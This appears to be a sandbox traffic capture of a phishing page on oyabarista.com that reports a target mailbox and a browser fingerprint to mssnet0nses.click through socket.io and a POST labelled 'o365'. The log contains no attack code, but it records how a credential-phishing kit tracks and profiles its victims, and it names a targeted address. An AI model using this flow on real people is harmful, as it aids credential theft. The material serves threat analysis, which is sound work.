                                                        2025-03-27 13:41:53 UTC831INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:53 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CwezEEu4c1Pxcj6QxNGsTD5LJyW1IiYKTa%2Fw7ciMF3aYxh1WePaIdI8lbQG67ED7FtApgLXdjk77gL%2FK4DwtEK84VPhdXX%2FRaMFD010zmOA1I1qL9lxZ9rYjsFcnYnWlFJT%2BcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ed36a40422b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83525&min_rtt=83491&rtt_var=17633&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1022&delivery_rate=36601&cwnd=252&unsent_bytes=0&cid=398d79ab6e875496&ts=306&x=0"
                                                        2025-03-27 13:41:53 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:41:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        57192.168.2.549810172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:53 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrdm- HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:54 UTC939INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:54 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f1VB279vkCw1toBJfNPJ3RfxxzjgVL84rXuohaQ3IDftBESwbMPzMECz0FUYCcT52bIlVHpkh0xKzE7uo%2FTl90lueYhcG7UelfncBm8S3W29nj%2Fn9Mqcvo9v5sXmsNHZpDatSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ed54ed3f5f8-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83584&min_rtt=83569&rtt_var=17653&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1139&delivery_rate=36556&cwnd=252&unsent_bytes=0&cid=8bbc7331f32d3490&ts=315&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        58192.168.2.549811172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:54 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrdm- HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:54 UTC300INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:54 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: no-store
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ed85873624e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:41:54 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 74 54 35 57 4e 62 53 38 6e 4b 5f 47 6d 4b 74 44 41 41 66 43 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"tT5WNbS8nK_GmKtDAAfC","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        59192.168.2.549814172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:54 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: 5jfX6saXYEEcvpXSeai5fA==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:41:55 UTC831INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:55 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzlWkY5CEUnq6K3C%2FcCQKicAwX7DpWrRM%2F2tYeT4NZbHtArvJMO1X1S2An%2BE%2Fm5z8fNw4iXZBoyS71rpVLUqNBXVtHob3QtLhlElb9UCMyJozRpcV2SwpDdgkz9OHg6x4apZAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4edb6a5b4f4e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84142&min_rtt=84031&rtt_var=17894&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1121&delivery_rate=36229&cwnd=252&unsent_bytes=0&cid=1b066f2012e878c0&ts=302&x=0"
                                                        2025-03-27 13:41:55 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:41:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        60192.168.2.549815172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:54 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrdm- HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:55 UTC842INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:55 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KoxnrQ7vWey0Pjud%2FhBygHsJAYDdOmJ9J8d4HoYyegTNbUrLTk7ypD5zPaftbHm9XnNvNAHkan35ZEUJMpkV0H17zCmKVcbqZZq2CzV1tHFSMOQSr4HXvr9pt33V8LuzfaWLfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4edb7b2d1921-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83343&min_rtt=83140&rtt_var=17846&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=997&delivery_rate=36491&cwnd=252&unsent_bytes=0&cid=807902f6367fba51&ts=311&x=0"
                                                        2025-03-27 13:41:55 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 32 30 39 57 61 6b 78 67 4f 42 38 63 6f 78 73 57 41 41 66 44 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"209WakxgOB8coxsWAAfD","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.2.549813172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:54 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNre0A&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:55 UTC939INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:55 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uedL5EHGc3cKlCLy%2F3N5b8kV04HrmotUsoZFmE7a9K2aSHquV%2Fr4JN14AtcsPGYmKEohJh7q1duRGAbHvKzDerGYMsqWyWQYNfPsnL7gWPwp2JGCqrlKtWuctEMjRzna0rGJjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4edb69ce9a1a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84488&min_rtt=84258&rtt_var=18124&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1165&delivery_rate=35971&cwnd=252&unsent_bytes=0&cid=2d36c88aaeb01485&ts=311&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        62192.168.2.549812172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:54 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNre0C&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:55 UTC941INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:55 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NY%2Fm1ILXxDwWqQhFnCDggXRb8cpo9rF8zaQY6hE%2BnGtE%2BD2utwstkSoiw1O0uO5PaiMhaeXc8zZrbHX96EOVM4EztOaCZiAHqQFIIgJ5U0Lo2uhhpTX4poyJVhHTnoOxphQJ0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4edb6c6f41b4-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84377&min_rtt=83790&rtt_var=18258&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1164&delivery_rate=36445&cwnd=252&unsent_bytes=0&cid=475d8781903c64c5&ts=359&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        63192.168.2.549816172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:55 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNre0A&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:55 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:41:55 UTC842INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:55 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2C%2F0mFAjCd7hKe9bSMn5DRiQ1hou6lpQu9kP5FTGo07Dw7PZq%2FtbFYfEjvPul68lPGo%2B%2BKTmyou3g93wuMuTsnLc%2B8AmvMja2PvFYF8rb3B7uIi06iVJSq48hUsjKAWL23ISg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ede7f05e0ee-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84818&min_rtt=84349&rtt_var=18498&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1348&delivery_rate=35640&cwnd=252&unsent_bytes=0&cid=00dc630b85d4aec5&ts=266&x=0"
                                                        2025-03-27 13:41:55 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:41:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        64192.168.2.549817172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:55 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNre0C&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:56 UTC847INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:56 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eiYQHYeUwBLzt%2FOp%2Bnoi%2BmjE2wcLZi0HE3iItY9zKiIVPpIQXkxYtMsbBE3yd0RkjvFtWcy5IdRtbb1%2ByrpBQKza9VQc6PbKBfGTqAQzoaDLoTQVUygB4r1rxD5EgsidYH2VWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4edeb99e624e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84269&min_rtt=84234&rtt_var=17794&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1264&delivery_rate=36283&cwnd=252&unsent_bytes=0&cid=d252d1a3ba78c850&ts=710&x=0"
                                                        2025-03-27 13:41:56 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        65192.168.2.549818172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:55 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNre0A&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:56 UTC803INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:56 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vr%2FpnDapjLXf9wZUj8eC%2F6YIGwAyucoNv9BSbqel42ccyRT9nMmqMsGecbk9XpaWwfhPFMO549BNN4KWI6UHXHfKJMg%2FXI4wjlx%2FWNIAOS696JrTKFzn%2B3civNJU9siCp8%2FIYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ee14be05e80-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83609&min_rtt=83409&rtt_var=17899&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1022&delivery_rate=36378&cwnd=252&unsent_bytes=0&cid=6e2a96bbad098024&ts=318&x=0"
                                                        2025-03-27 13:41:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        66192.168.2.549808104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:56 UTC1021OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:56 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:41:56 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:41:56 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
